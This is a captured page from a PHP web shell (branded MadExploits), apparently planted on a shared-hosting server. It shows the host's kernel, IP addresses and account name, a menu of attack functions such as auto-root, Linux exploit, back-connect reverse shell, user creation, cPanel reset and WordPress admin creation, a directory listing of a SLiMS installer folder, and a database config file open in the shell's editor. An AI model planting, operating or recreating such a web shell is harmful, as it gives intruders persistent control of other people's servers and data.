Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.17
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
slims /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
changelog.txt
4.62
KB
-rw-r--r--
clone.php
5.1
KB
-rw-r--r--
database.php
916
B
-rw-r--r--
edit.php
4.25
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
env.php
921
B
-rw-r--r--
extend.php
8.73
KB
-rw-r--r--
fileindex.php
393
B
-rw-r--r--
import.php
3.76
KB
-rw-r--r--
info.xml
3.74
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
4.86
KB
-rw-r--r--
install.xml
1.38
KB
-rw-r--r--
md5
2.35
KB
-rw-r--r--
notes.txt
480
B
-rw-r--r--
slims.sql
111.36
KB
-rw-r--r--
slims.zip
49.95
MB
-rw-r--r--
update_pass.php
257
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : database.php
<?php return [ /** * Default database node profile */ 'default_profile' => 'SLiMS', /** * SLiMS as Service, One SLiMS for many library * ---------------------------------------------------- * * Switching database node access based on rule, * such as domain, ip, port etc * * How to : * 1. make file with name database_proxy.php in config/ * 2. make your own rule in that file. * 3. change this value to true */ 'proxy' => false, /** * Nodes profile */ 'nodes' => [ 'SLiMS' => [ 'host' => '[[softdbhost]]', 'database' => '[[softdb]]', 'port' => 3306, 'username' => '[[softdbuser]]', 'password' => '[[softdbpass]]', 'options' => [ 'storage_engine' => 'MyISAM' ] ], // add more here ] ];
Close